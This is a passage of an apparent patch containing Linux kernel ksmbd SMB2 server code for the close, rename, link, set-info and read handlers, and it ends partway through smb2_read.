+-	if (req->Flags == SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB) {
+-		fp = ksmbd_lookup_fd_fast(work, volatile_id);
+-		if (!fp) {
+-			err = -ENOENT;
+-			goto out;
+-		}
+-
+-		inode = file_inode(fp->filp);
+-		rsp->Flags = SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB;
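+-		/* inode->i_blocks counts 512-byte units, so shift by 9 for bytes */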
+-		rsp->AllocationSize = S_ISDIR(inode->i_mode) ? 0 :
+-			cpu_to_le64(inode->i_blocks << 9);
+-		rsp->EndOfFile = cpu_to_le64(inode->i_size);
+-		rsp->Attributes = fp->f_ci->m_fattr;
+-		rsp->CreationTime = cpu_to_le64(fp->create_time);
+-		time = ksmbd_UnixTimeToNT(inode->i_atime);
+-		rsp->LastAccessTime = cpu_to_le64(time);
+-		time = ksmbd_UnixTimeToNT(inode->i_mtime);
+-		rsp->LastWriteTime = cpu_to_le64(time);
+-		time = ksmbd_UnixTimeToNT(inode->i_ctime);
+-		rsp->ChangeTime = cpu_to_le64(time);
+-		ksmbd_fd_put(work, fp);
+-	} else {
+-		rsp->Flags = 0;
+-		rsp->AllocationSize = 0;
+-		rsp->EndOfFile = 0;
+-		rsp->Attributes = 0;
+-		rsp->CreationTime = 0;
+-		rsp->LastAccessTime = 0;
+-		rsp->LastWriteTime = 0;
+-		rsp->ChangeTime = 0;
+-	}
+-
+-	err = ksmbd_close_fd(work, volatile_id);
+-out:
+-	if (err) {
+-		if (rsp->hdr.Status == 0)
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		smb2_set_err_rsp(work);
+-	} else {
+-		inc_rfc1001_len(work->response_buf, 60);
+-	}
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_echo() - handler for smb2 echo(ping) command
+- * @work:	smb work containing echo request buffer
+- *
+- * Return:	0
+- */
+-int smb2_echo(struct ksmbd_work *work)
+-{
+-	struct smb2_echo_rsp *rsp = smb2_get_msg(work->response_buf);
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	return 0;
+-}
+-
+-static int smb2_rename(struct ksmbd_work *work,
+-		       struct ksmbd_file *fp,
+-		       struct user_namespace *user_ns,
+-		       struct smb2_file_rename_info *file_info,
+-		       struct nls_table *local_nls)
+-{
+-	struct ksmbd_share_config *share = fp->tcon->share_conf;
+-	char *new_name = NULL, *abs_oldname = NULL, *old_name = NULL;
+-	char *pathname = NULL;
+-	struct path path;
+-	bool file_present = true;
+-	int rc;
+-
+-	ksmbd_debug(SMB, "setting FILE_RENAME_INFO\n");
+-	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!pathname)
+-		return -ENOMEM;
+-
+-	abs_oldname = file_path(fp->filp, pathname, PATH_MAX);
+-	if (IS_ERR(abs_oldname)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	old_name = strrchr(abs_oldname, '/');
+-	if (old_name && old_name[1] != '\0') {
+-		old_name++;
+-	} else {
+-		ksmbd_debug(SMB, "can't get last component in path %s\n",
+-			    abs_oldname);
+-		rc = -ENOENT;
+-		goto out;
+-	}
+-
+-	new_name = smb2_get_name(file_info->FileName,
+-				 le32_to_cpu(file_info->FileNameLength),
+-				 local_nls);
+-	if (IS_ERR(new_name)) {
+-		rc = PTR_ERR(new_name);
+-		goto out;
+-	}
+-
+-	if (strchr(new_name, ':')) {
+-		int s_type;
+-		char *xattr_stream_name, *stream_name = NULL;
+-		size_t xattr_stream_size;
+-		int len;
+-
+-		rc = parse_stream_name(new_name, &stream_name, &s_type);
+-		if (rc < 0)
+-			goto out;
+-
+-		len = strlen(new_name);
+-		if (len > 0 && new_name[len - 1] != '/') {
+-			pr_err("renaming the base file name is not allowed\n");
+-			rc = -ESHARE;
+-			goto out;
+-		}
+-
+-		rc = ksmbd_vfs_xattr_stream_name(stream_name,
+-						 &xattr_stream_name,
+-						 &xattr_stream_size,
+-						 s_type);
+-		if (rc)
+-			goto out;
+-
+-		rc = ksmbd_vfs_setxattr(user_ns,
+-					fp->filp->f_path.dentry,
+-					xattr_stream_name,
+-					NULL, 0, 0);
+-		if (rc < 0) {
+-			pr_err("failed to store stream name in xattr: %d\n",
+-			       rc);
+-			rc = -EINVAL;
+-			goto out;
+-		}
+-
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "new name %s\n", new_name);
+-	rc = ksmbd_vfs_kern_path(work, new_name, LOOKUP_NO_SYMLINKS, &path, 1);
+-	if (rc) {
+-		if (rc != -ENOENT)
+-			goto out;
+-		file_present = false;
+-	} else {
+-		path_put(&path);
+-	}
+-
+-	if (ksmbd_share_veto_filename(share, new_name)) {
+-		rc = -ENOENT;
+-		ksmbd_debug(SMB, "Can't rename vetoed file: %s\n", new_name);
+-		goto out;
+-	}
+-
+-	if (file_info->ReplaceIfExists) {
+-		if (file_present) {
+-			rc = ksmbd_vfs_remove_file(work, new_name);
+-			if (rc) {
+-				if (rc != -ENOTEMPTY)
+-					rc = -EINVAL;
+-				ksmbd_debug(SMB, "cannot delete %s, rc %d\n",
+-					    new_name, rc);
+-				goto out;
+-			}
+-		}
+-	} else {
+-		if (file_present &&
+-		    strncmp(old_name, path.dentry->d_name.name, strlen(old_name))) {
+-			rc = -EEXIST;
+-			ksmbd_debug(SMB,
+-				    "cannot rename: target file already exists\n");
+-			goto out;
+-		}
+-	}
+-
+-	rc = ksmbd_vfs_fp_rename(work, fp, new_name);
+-out:
+-	kfree(pathname);
+-	if (!IS_ERR(new_name))
+-		kfree(new_name);
+-	return rc;
+-}
+-
+-static int smb2_create_link(struct ksmbd_work *work,
+-			    struct ksmbd_share_config *share,
+-			    struct smb2_file_link_info *file_info,
+-			    unsigned int buf_len, struct file *filp,
+-			    struct nls_table *local_nls)
+-{
+-	char *link_name = NULL, *target_name = NULL, *pathname = NULL;
+-	struct path path;
+-	bool file_present = true;
+-	int rc;
+-
+-	if (buf_len < (u64)sizeof(struct smb2_file_link_info) +
+-			le32_to_cpu(file_info->FileNameLength))
+-		return -EINVAL;
+-
+-	ksmbd_debug(SMB, "setting FILE_LINK_INFORMATION\n");
+-	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!pathname)
+-		return -ENOMEM;
+-
+-	link_name = smb2_get_name(file_info->FileName,
+-				  le32_to_cpu(file_info->FileNameLength),
+-				  local_nls);
+-	if (IS_ERR(link_name) || S_ISDIR(file_inode(filp)->i_mode)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "link name is %s\n", link_name);
+-	target_name = file_path(filp, pathname, PATH_MAX);
+-	if (IS_ERR(target_name)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "target name is %s\n", target_name);
+-	rc = ksmbd_vfs_kern_path(work, link_name, LOOKUP_NO_SYMLINKS, &path, 0);
+-	if (rc) {
+-		if (rc != -ENOENT)
+-			goto out;
+-		file_present = false;
+-	} else {
+-		path_put(&path);
+-	}
+-
+-	if (file_info->ReplaceIfExists) {
+-		if (file_present) {
+-			rc = ksmbd_vfs_remove_file(work, link_name);
+-			if (rc) {
+-				rc = -EINVAL;
+-				ksmbd_debug(SMB, "cannot delete %s\n",
+-					    link_name);
+-				goto out;
+-			}
+-		}
+-	} else {
+-		if (file_present) {
+-			rc = -EEXIST;
+-			ksmbd_debug(SMB, "link already exists\n");
+-			goto out;
+-		}
+-	}
+-
+-	rc = ksmbd_vfs_link(work, target_name, link_name);
+-	if (rc)
+-		rc = -EINVAL;
+-out:
+-	if (!IS_ERR(link_name))
+-		kfree(link_name);
+-	kfree(pathname);
+-	return rc;
+-}
+-
+-static int set_file_basic_info(struct ksmbd_file *fp,
+-			       struct smb2_file_basic_info *file_info,
+-			       struct ksmbd_share_config *share)
+-{
+-	struct iattr attrs;
+-	struct file *filp;
+-	struct inode *inode;
+-	struct user_namespace *user_ns;
+-	int rc = 0;
+-
+-	if (!(fp->daccess & FILE_WRITE_ATTRIBUTES_LE))
+-		return -EACCES;
+-
+-	attrs.ia_valid = 0;
+-	filp = fp->filp;
+-	inode = file_inode(filp);
+-	user_ns = file_mnt_user_ns(filp);
+-
+-	if (file_info->CreationTime)
+-		fp->create_time = le64_to_cpu(file_info->CreationTime);
+-
+-	if (file_info->LastAccessTime) {
+-		attrs.ia_atime = ksmbd_NTtimeToUnix(file_info->LastAccessTime);
+-		attrs.ia_valid |= (ATTR_ATIME | ATTR_ATIME_SET);
+-	}
+-
+-	attrs.ia_valid |= ATTR_CTIME;
+-	if (file_info->ChangeTime)
+-		attrs.ia_ctime = ksmbd_NTtimeToUnix(file_info->ChangeTime);
+-	else
+-		attrs.ia_ctime = inode->i_ctime;
+-
+-	if (file_info->LastWriteTime) {
+-		attrs.ia_mtime = ksmbd_NTtimeToUnix(file_info->LastWriteTime);
+-		attrs.ia_valid |= (ATTR_MTIME | ATTR_MTIME_SET);
+-	}
+-
+-	if (file_info->Attributes) {
+-		if (!S_ISDIR(inode->i_mode) &&
+-		    file_info->Attributes & FILE_ATTRIBUTE_DIRECTORY_LE) {
+-			pr_err("can't change a file to a directory\n");
+-			return -EINVAL;
+-		}
+-
+-		if (!(S_ISDIR(inode->i_mode) && file_info->Attributes == FILE_ATTRIBUTE_NORMAL_LE))
+-			fp->f_ci->m_fattr = file_info->Attributes |
+-				(fp->f_ci->m_fattr & FILE_ATTRIBUTE_DIRECTORY_LE);
+-	}
+-
+-	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_STORE_DOS_ATTRS) &&
+-	    (file_info->CreationTime || file_info->Attributes)) {
+-		struct xattr_dos_attrib da = {0};
+-
+-		da.version = 4;
+-		da.itime = fp->itime;
+-		da.create_time = fp->create_time;
+-		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
+-		da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
+-			XATTR_DOSINFO_ITIME;
+-
+-		rc = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
+-						    filp->f_path.dentry, &da);
+-		if (rc)
+-			ksmbd_debug(SMB,
+-				    "failed to restore file attribute in EA\n");
+-		rc = 0;
+-	}
+-
+-	if (attrs.ia_valid) {
+-		struct dentry *dentry = filp->f_path.dentry;
+-		struct inode *inode = d_inode(dentry);
+-
+-		if (IS_IMMUTABLE(inode) || IS_APPEND(inode))
+-			return -EACCES;
+-
+-		inode_lock(inode);
+-		inode->i_ctime = attrs.ia_ctime;
+-		attrs.ia_valid &= ~ATTR_CTIME;
+-		rc = notify_change(user_ns, dentry, &attrs, NULL);
+-		inode_unlock(inode);
+-	}
+-	return rc;
+-}
+-
+-static int set_file_allocation_info(struct ksmbd_work *work,
+-				    struct ksmbd_file *fp,
+-				    struct smb2_file_alloc_info *file_alloc_info)
+-{
+-	/*
+-	 * TODO: This works correctly only when "store dos attributes"
+-	 * is not set to yes. Implement logic that works properly with
+-	 * any smb.conf option.
+-	 */
+-
+-	loff_t alloc_blks;
+-	struct inode *inode;
+-	int rc;
+-
+-	if (!(fp->daccess & FILE_WRITE_DATA_LE))
+-		return -EACCES;
+-
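+-	/* Round the requested size up to 512-byte blocks, the unit of inode->i_blocks */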
+-	alloc_blks = (le64_to_cpu(file_alloc_info->AllocationSize) + 511) >> 9;
+-	inode = file_inode(fp->filp);
+-
+-	if (alloc_blks > inode->i_blocks) {
+-		smb_break_all_levII_oplock(work, fp, 1);
+-		rc = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
+-				   alloc_blks * 512);
+-		if (rc && rc != -EOPNOTSUPP) {
+-			pr_err("vfs_fallocate failed: %d\n", rc);
+-			return rc;
+-		}
+-	} else if (alloc_blks < inode->i_blocks) {
+-		loff_t size;
+-
+-		/*
+-		 * The allocation size may be smaller than the original,
+-		 * which means allocated blocks in the file must be
+-		 * deallocated. Use truncate to trim them; truncate also
+-		 * updates the inode size to the truncate offset, so the
+-		 * inode size saved beforehand is restored afterwards.
+-		 */
+-		size = i_size_read(inode);
+-		rc = ksmbd_vfs_truncate(work, fp, alloc_blks * 512);
+-		if (rc) {
+-			pr_err("truncate failed, err %d\n", rc);
+-			return rc;
+-		}
+-		if (size < alloc_blks * 512)
+-			i_size_write(inode, size);
+-	}
+-	return 0;
+-}
+-
+-static int set_end_of_file_info(struct ksmbd_work *work, struct ksmbd_file *fp,
+-				struct smb2_file_eof_info *file_eof_info)
+-{
+-	loff_t newsize;
+-	struct inode *inode;
+-	int rc;
+-
+-	if (!(fp->daccess & FILE_WRITE_DATA_LE))
+-		return -EACCES;
+-
+-	newsize = le64_to_cpu(file_eof_info->EndOfFile);
+-	inode = file_inode(fp->filp);
+-
+-	/*
+-	 * If FILE_END_OF_FILE_INFORMATION of set_info_file is issued
+-	 * on a FAT32-backed share, truncation takes too long and can
+-	 * trigger a network error on the Windows client, because
+-	 * filesystems like FAT32 zero-fill the truncated range.
+-	 */
+-	if (inode->i_sb->s_magic != MSDOS_SUPER_MAGIC) {
+-		ksmbd_debug(SMB, "truncated to newsize %lld\n", newsize);
+-		rc = ksmbd_vfs_truncate(work, fp, newsize);
+-		if (rc) {
+-			ksmbd_debug(SMB, "truncate failed, err %d\n", rc);
+-			if (rc != -EAGAIN)
+-				rc = -EBADF;
+-			return rc;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static int set_rename_info(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			   struct smb2_file_rename_info *rename_info,
+-			   unsigned int buf_len)
+-{
+-	struct user_namespace *user_ns;
+-	struct ksmbd_file *parent_fp;
+-	struct dentry *parent;
+-	struct dentry *dentry = fp->filp->f_path.dentry;
+-	int ret;
+-
+-	if (!(fp->daccess & FILE_DELETE_LE)) {
+-		pr_err("no right to delete: 0x%x\n", fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	if (buf_len < (u64)sizeof(struct smb2_file_rename_info) +
+-			le32_to_cpu(rename_info->FileNameLength))
+-		return -EINVAL;
+-
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	if (ksmbd_stream_fd(fp))
+-		goto next;
+-
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	parent_fp = ksmbd_lookup_fd_inode(d_inode(parent));
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-
+-	if (parent_fp) {
+-		if (parent_fp->daccess & FILE_DELETE_LE) {
+-			pr_err("parent dir is opened with delete access\n");
+-			ksmbd_fd_put(work, parent_fp);
+-			return -ESHARE;
+-		}
+-		ksmbd_fd_put(work, parent_fp);
+-	}
+-next:
+-	return smb2_rename(work, fp, user_ns, rename_info,
+-			   work->conn->local_nls);
+-}
+-
+-static int set_file_disposition_info(struct ksmbd_file *fp,
+-				     struct smb2_file_disposition_info *file_info)
+-{
+-	struct inode *inode;
+-
+-	if (!(fp->daccess & FILE_DELETE_LE)) {
+-		pr_err("no right to delete: 0x%x\n", fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	inode = file_inode(fp->filp);
+-	if (file_info->DeletePending) {
+-		if (S_ISDIR(inode->i_mode) &&
+-		    ksmbd_vfs_empty_dir(fp) == -ENOTEMPTY)
+-			return -EBUSY;
+-		ksmbd_set_inode_pending_delete(fp);
+-	} else {
+-		ksmbd_clear_inode_pending_delete(fp);
+-	}
+-	return 0;
+-}
+-
+-static int set_file_position_info(struct ksmbd_file *fp,
+-				  struct smb2_file_pos_info *file_info)
+-{
+-	loff_t current_byte_offset;
+-	unsigned long sector_size;
+-	struct inode *inode;
+-
+-	inode = file_inode(fp->filp);
+-	current_byte_offset = le64_to_cpu(file_info->CurrentByteOffset);
+-	sector_size = inode->i_sb->s_blocksize;
+-
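+-	/* With FILE_NO_INTERMEDIATE_BUFFERING the position must be sector-aligned */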
+-	if (current_byte_offset < 0 ||
+-	    (fp->coption == FILE_NO_INTERMEDIATE_BUFFERING_LE &&
+-	     current_byte_offset & (sector_size - 1))) {
+-		pr_err("CurrentByteOffset is not valid: %llu\n",
+-		       current_byte_offset);
+-		return -EINVAL;
+-	}
+-
+-	fp->filp->f_pos = current_byte_offset;
+-	return 0;
+-}
+-
+-static int set_file_mode_info(struct ksmbd_file *fp,
+-			      struct smb2_file_mode_info *file_info)
+-{
+-	__le32 mode;
+-
+-	mode = file_info->Mode;
+-
+-	if ((mode & ~FILE_MODE_INFO_MASK)) {
+-		pr_err("Mode is not valid: 0x%x\n", le32_to_cpu(mode));
+-		return -EINVAL;
+-	}
+-
+-	/*
+-	 * TODO : need to implement consideration for
+-	 * FILE_SYNCHRONOUS_IO_ALERT and FILE_SYNCHRONOUS_IO_NONALERT
+-	 */
+-	ksmbd_vfs_set_fadvise(fp->filp, mode);
+-	fp->coption = mode;
+-	return 0;
+-}
+-
+-/**
+- * smb2_set_info_file() - handler for smb2 set info command
+- * @work:	smb work containing set info command buffer
+- * @fp:		ksmbd_file pointer
+- * @req:	request buffer pointer
+- * @share:	ksmbd_share_config pointer
+- *
+- * Return:	0 on success, otherwise error
+- * TODO: need to implement an error handling for STATUS_INFO_LENGTH_MISMATCH
+- */
+-static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			      struct smb2_set_info_req *req,
+-			      struct ksmbd_share_config *share)
+-{
+-	unsigned int buf_len = le32_to_cpu(req->BufferLength);
+-
+-	switch (req->FileInfoClass) {
+-	case FILE_BASIC_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_basic_info))
+-			return -EINVAL;
+-
+-		return set_file_basic_info(fp, (struct smb2_file_basic_info *)req->Buffer, share);
+-	}
+-	case FILE_ALLOCATION_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_alloc_info))
+-			return -EINVAL;
+-
+-		return set_file_allocation_info(work, fp,
+-						(struct smb2_file_alloc_info *)req->Buffer);
+-	}
+-	case FILE_END_OF_FILE_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_eof_info))
+-			return -EINVAL;
+-
+-		return set_end_of_file_info(work, fp,
+-					    (struct smb2_file_eof_info *)req->Buffer);
+-	}
+-	case FILE_RENAME_INFORMATION:
+-	{
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			return -EACCES;
+-		}
+-
+-		if (buf_len < sizeof(struct smb2_file_rename_info))
+-			return -EINVAL;
+-
+-		return set_rename_info(work, fp,
+-				       (struct smb2_file_rename_info *)req->Buffer,
+-				       buf_len);
+-	}
+-	case FILE_LINK_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_link_info))
+-			return -EINVAL;
+-
+-		return smb2_create_link(work, work->tcon->share_conf,
+-					(struct smb2_file_link_info *)req->Buffer,
+-					buf_len, fp->filp,
+-					work->conn->local_nls);
+-	}
+-	case FILE_DISPOSITION_INFORMATION:
+-	{
+-		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			return -EACCES;
+-		}
+-
+-		if (buf_len < sizeof(struct smb2_file_disposition_info))
+-			return -EINVAL;
+-
+-		return set_file_disposition_info(fp,
+-						 (struct smb2_file_disposition_info *)req->Buffer);
+-	}
+-	case FILE_FULL_EA_INFORMATION:
+-	{
+-		if (!(fp->daccess & FILE_WRITE_EA_LE)) {
+-			pr_err("Not permitted to write ext attr: 0x%x\n",
+-			       fp->daccess);
+-			return -EACCES;
+-		}
+-
+-		if (buf_len < sizeof(struct smb2_ea_info))
+-			return -EINVAL;
+-
+-		return smb2_set_ea((struct smb2_ea_info *)req->Buffer,
+-				   buf_len, &fp->filp->f_path);
+-	}
+-	case FILE_POSITION_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_pos_info))
+-			return -EINVAL;
+-
+-		return set_file_position_info(fp, (struct smb2_file_pos_info *)req->Buffer);
+-	}
+-	case FILE_MODE_INFORMATION:
+-	{
+-		if (buf_len < sizeof(struct smb2_file_mode_info))
+-			return -EINVAL;
+-
+-		return set_file_mode_info(fp, (struct smb2_file_mode_info *)req->Buffer);
+-	}
+-	}
+-
+-	pr_err("Unimplemented FileInfoClass: %d\n", req->FileInfoClass);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int smb2_set_info_sec(struct ksmbd_file *fp, int addition_info,
+-			     char *buffer, int buf_len)
+-{
+-	struct smb_ntsd *pntsd = (struct smb_ntsd *)buffer;
+-
+-	fp->saccess |= FILE_SHARE_DELETE_LE;
+-
+-	return set_info_sec(fp->conn, fp->tcon, &fp->filp->f_path, pntsd,
+-			buf_len, false);
+-}
+-
+-/**
+- * smb2_set_info() - handler for smb2 set info command handler
+- * @work:	smb work containing set info request buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_set_info(struct ksmbd_work *work)
+-{
+-	struct smb2_set_info_req *req;
+-	struct smb2_set_info_rsp *rsp;
+-	struct ksmbd_file *fp;
+-	int rc = 0;
+-	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+-
+-	ksmbd_debug(SMB, "Received set info request\n");
+-
+-	if (work->next_smb2_rcv_hdr_off) {
+-		req = ksmbd_req_buf_next(work);
+-		rsp = ksmbd_resp_buf_next(work);
+-		if (!has_file_id(req->VolatileFileId)) {
+-			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
+-				    work->compound_fid);
+-			id = work->compound_fid;
+-			pid = work->compound_pfid;
+-		}
+-	} else {
+-		req = smb2_get_msg(work->request_buf);
+-		rsp = smb2_get_msg(work->response_buf);
+-	}
+-
+-	if (!has_file_id(id)) {
+-		id = req->VolatileFileId;
+-		pid = req->PersistentFileId;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, id, pid);
+-	if (!fp) {
+-		ksmbd_debug(SMB, "Invalid id for set info: %u\n", id);
+-		rc = -ENOENT;
+-		goto err_out;
+-	}
+-
+-	switch (req->InfoType) {
+-	case SMB2_O_INFO_FILE:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
+-		rc = smb2_set_info_file(work, fp, req, work->tcon->share_conf);
+-		break;
+-	case SMB2_O_INFO_SECURITY:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_SECURITY\n");
+-		if (ksmbd_override_fsids(work)) {
+-			rc = -ENOMEM;
+-			goto err_out;
+-		}
+-		rc = smb2_set_info_sec(fp,
+-				       le32_to_cpu(req->AdditionalInformation),
+-				       req->Buffer,
+-				       le32_to_cpu(req->BufferLength));
+-		ksmbd_revert_fsids(work);
+-		break;
+-	default:
+-		rc = -EOPNOTSUPP;
+-	}
+-
+-	if (rc < 0)
+-		goto err_out;
+-
+-	rsp->StructureSize = cpu_to_le16(2);
+-	inc_rfc1001_len(work->response_buf, 2);
+-	ksmbd_fd_put(work, fp);
+-	return 0;
+-
+-err_out:
+-	if (rc == -EACCES || rc == -EPERM || rc == -EXDEV)
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	else if (rc == -EINVAL)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	else if (rc == -ESHARE)
+-		rsp->hdr.Status = STATUS_SHARING_VIOLATION;
+-	else if (rc == -ENOENT)
+-		rsp->hdr.Status = STATUS_OBJECT_NAME_INVALID;
+-	else if (rc == -EBUSY || rc == -ENOTEMPTY)
+-		rsp->hdr.Status = STATUS_DIRECTORY_NOT_EMPTY;
+-	else if (rc == -EAGAIN)
+-		rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
+-	else if (rc == -EBADF || rc == -ESTALE)
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-	else if (rc == -EEXIST)
+-		rsp->hdr.Status = STATUS_OBJECT_NAME_COLLISION;
+-	else if (rsp->hdr.Status == 0 || rc == -EOPNOTSUPP)
+-		rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
+-	smb2_set_err_rsp(work);
+-	ksmbd_fd_put(work, fp);
+-	ksmbd_debug(SMB, "error while processing smb2 set info rc = %d\n", rc);
+-	return rc;
+-}
+-
+-/**
+- * smb2_read_pipe() - handler for smb2 read from IPC pipe
+- * @work:	smb work containing read IPC pipe command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static noinline int smb2_read_pipe(struct ksmbd_work *work)
+-{
+-	int nbytes = 0, err;
+-	u64 id;
+-	struct ksmbd_rpc_command *rpc_resp;
+-	struct smb2_read_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_read_rsp *rsp = smb2_get_msg(work->response_buf);
+-
+-	id = req->VolatileFileId;
+-
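+-	/* Account for the 16 fixed bytes of the read response body up front */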
+-	inc_rfc1001_len(work->response_buf, 16);
+-	rpc_resp = ksmbd_rpc_read(work->sess, id);
+-	if (rpc_resp) {
+-		if (rpc_resp->flags != KSMBD_RPC_OK) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		work->aux_payload_buf =
+-			kvmalloc(rpc_resp->payload_sz, GFP_KERNEL | __GFP_ZERO);
+-		if (!work->aux_payload_buf) {
+-			err = -ENOMEM;
+-			goto out;
+-		}
+-
+-		memcpy(work->aux_payload_buf, rpc_resp->payload,
+-		       rpc_resp->payload_sz);
+-
+-		nbytes = rpc_resp->payload_sz;
+-		work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
+-		work->aux_payload_sz = nbytes;
+-		kvfree(rpc_resp);
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(17);
+-	rsp->DataOffset = 80;
+-	rsp->Reserved = 0;
+-	rsp->DataLength = cpu_to_le32(nbytes);
+-	rsp->DataRemaining = 0;
+-	rsp->Flags = 0;
+-	inc_rfc1001_len(work->response_buf, nbytes);
+-	return 0;
+-
+-out:
+-	rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-	smb2_set_err_rsp(work);
+-	kvfree(rpc_resp);
+-	return err;
+-}
+-
+-static int smb2_set_remote_key_for_rdma(struct ksmbd_work *work,
+-					struct smb2_buffer_desc_v1 *desc,
+-					__le32 Channel,
+-					__le16 ChannelInfoLength)
+-{
+-	unsigned int i, ch_count;
+-
+-	if (work->conn->dialect == SMB30_PROT_ID &&
+-	    Channel != SMB2_CHANNEL_RDMA_V1)
+-		return -EINVAL;
+-
+-	ch_count = le16_to_cpu(ChannelInfoLength) / sizeof(*desc);
+-	if (ksmbd_debug_types & KSMBD_DEBUG_RDMA) {
+-		for (i = 0; i < ch_count; i++) {
+-			pr_info("RDMA r/w request %#x: token %#x, length %#x\n",
+-				i,
+-				le32_to_cpu(desc[i].token),
+-				le32_to_cpu(desc[i].length));
+-		}
+-	}
+-	if (!ch_count)
+-		return -EINVAL;
+-
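+-	/* Remember whether the client's remote key must be invalidated after the RDMA transfer */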
+-	work->need_invalidate_rkey =
+-		(Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE);
+-	if (Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE)
+-		work->remote_key = le32_to_cpu(desc->token);
+-	return 0;
+-}
+-
+-static ssize_t smb2_read_rdma_channel(struct ksmbd_work *work,
+-				      struct smb2_read_req *req, void *data_buf,
+-				      size_t length)
+-{
+-	int err;
+-
+-	err = ksmbd_conn_rdma_write(work->conn, data_buf, length,
+-				    (struct smb2_buffer_desc_v1 *)
+-				    ((char *)req + le16_to_cpu(req->ReadChannelInfoOffset)),
+-				    le16_to_cpu(req->ReadChannelInfoLength));
+-	if (err)
+-		return err;
+-
+-	return length;
+-}
+-
+-/**
+- * smb2_read() - handler for smb2 read from file
+- * @work:	smb work containing read command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_read(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_read_req *req;
+-	struct smb2_read_rsp *rsp;
+-	struct ksmbd_file *fp = NULL;
+-	loff_t offset;
+-	size_t length, mincount;
+-	ssize_t nbytes = 0, remain_bytes = 0;
+-	int err = 0;
+-	bool is_rdma_channel = false;
+-	unsigned int max_read_size = conn->vals->max_read_size;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC pipe read request\n");
+-		return smb2_read_pipe(work);
+-	}
+-
+-	if (req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE ||
+-	    req->Channel == SMB2_CHANNEL_RDMA_V1) {
+-		is_rdma_channel = true;
+-		max_read_size = get_smbd_max_read_write_size();
+-	}
+-
+-	if (is_rdma_channel == true) {
+-		unsigned int ch_offset = le16_to_cpu(req->ReadChannelInfoOffset);
+-
+-		if (ch_offset < offsetof(struct smb2_read_req, Buffer)) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-		err = smb2_set_remote_key_for_rdma(work,
+-						   (struct smb2_buffer_desc_v1 *)
+-						   ((char *)req + ch_offset),
+-						   req->Channel,
+-						   req->ReadChannelInfoLength);
+-		if (err)
+-			goto out;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!fp) {
+-		err = -ENOENT;
+-		goto out;
+-	}
+-
+-	if (!(fp->daccess & (FILE_READ_DATA_LE | FILE_READ_ATTRIBUTES_LE))) {
+-		pr_err("Not permitted to read: 0x%x\n", fp->daccess);
+-		err = -EACCES;
+-		goto out;
+-	}
+-
+-	offset = le64_to_cpu(req->Offset);
+-	length = le32_to_cpu(req->Length);
+-	mincount = le32_to_cpu(req->MinimumCount);
+-
